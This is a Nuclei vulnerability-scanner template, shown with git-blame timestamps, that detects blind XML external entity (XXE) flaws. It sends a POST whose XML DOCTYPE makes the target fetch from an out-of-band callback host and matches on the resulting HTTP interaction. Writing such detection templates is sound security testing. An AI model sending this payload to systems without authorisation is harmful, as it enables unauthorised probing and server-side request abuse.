2021-08-17 11:48:52 +00:00
|
|
|
id: generic-blind-xxe
|
|
|
|
|
|
|
|
info:
|
|
|
|
name: Generic Blind XXE
|
|
|
|
author: geeknik
|
|
|
|
severity: high
|
2024-01-02 15:45:12 +00:00
|
|
|
description: This template detects Generic Blind XXE.
|
2023-04-28 08:11:21 +00:00
|
|
|
metadata:
|
|
|
|
max-request: 1
|
2023-10-14 11:27:55 +00:00
|
|
|
tags: xxe,generic,blind
|
2021-08-17 11:48:52 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2021-08-17 11:48:52 +00:00
|
|
|
- raw:
|
|
|
|
- |
|
|
|
|
POST / HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
|
|
|
Referer: {{BaseURL}}
|
2021-08-20 11:07:22 +00:00
|
|
|
|
2021-08-17 11:48:52 +00:00
|
|
|
<?xml version="1.0"?>
|
|
|
|
<!DOCTYPE foo SYSTEM "http://{{interactsh-url}}">
|
|
|
|
<foo>&e1;</foo>
|
|
|
|
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
part: interactsh_protocol
|
|
|
|
words:
|
|
|
|
- "http"
|
2024-01-15 11:49:24 +00:00
|
|
|
# digest: 4a0a004730450221009f57c234b06aeb89aa80bfae1c0d85972a7973ee948314fc288ec8aea57e55d2022006410f6df0c005505c1e9981aa48c612d380b1502ac805d11c3506fed6fc85c0:922c64590222798bb761d5b6d8e72950
|